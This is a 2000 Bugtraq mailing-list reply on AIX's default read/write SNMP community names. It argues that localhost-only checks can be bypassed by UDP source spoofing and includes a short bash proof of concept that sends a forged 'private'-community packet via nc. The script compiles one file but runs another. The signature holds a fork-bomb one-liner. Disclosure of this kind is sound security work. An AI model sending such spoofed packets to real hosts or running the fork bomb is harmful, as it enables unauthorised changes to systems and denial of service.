[13904] in bugtraq
Re: AIX SNMP Defaults
daemon@ATHENA.MIT.EDU (Michal Zalewski)
Fri Feb 18 00:43:39 2000
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.4.21.0002171122280.28680-100000@dione.ids.pl>
Date: Thu, 17 Feb 2000 11:28:54 +0100
Reply-To: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
From: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
X-To: harikiri <harikiri@ATTRITION.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <Pine.BSO.4.10.10002151819130.9777-100000@shaolin.fcbl.net>
On Tue, 15 Feb 2000, harikiri wrote:
> It appears that on the above releases of AIX, the SNMP daemon is
> enabled by default and two community names are enabled with read/write
> privileges. The community names are "private" and "system", but are
> only allowed from localhost connections. Nevertheless, a local user
> may install an SNMP client, and modify sensitive variables.
SNMP requests with no authentication except for source-IP comparsion, are
spoofable.
--snip--
#!/bin/bash
cat >/tmp/spoof1.c <<_EOF_
char
private[]="0\202\0-\2\1\0\4\7private\243\37\2\1\1\2\1\0\2\1\0000\0240\202"
"\0\20\6\10+\6\1\2\1\1\4\0\4\4null";
main() { write(1,private,sizeof(private)); }
_EOF_
gcc -o /tmp/spoof1 /tmp/spoof1.c
/tmp/spoof2 | nc -s FakeSourceIPHere -u RemoteIPHere 161
--snip--
UDP blind spoofing, nothing easier.
_______________________________________________________
Michal Zalewski * [lcamtuf@ags.pl] <=> [AGS WAN SYSADM]
[dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
[+48 22 813 25 86] [+48 603 110 160] bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
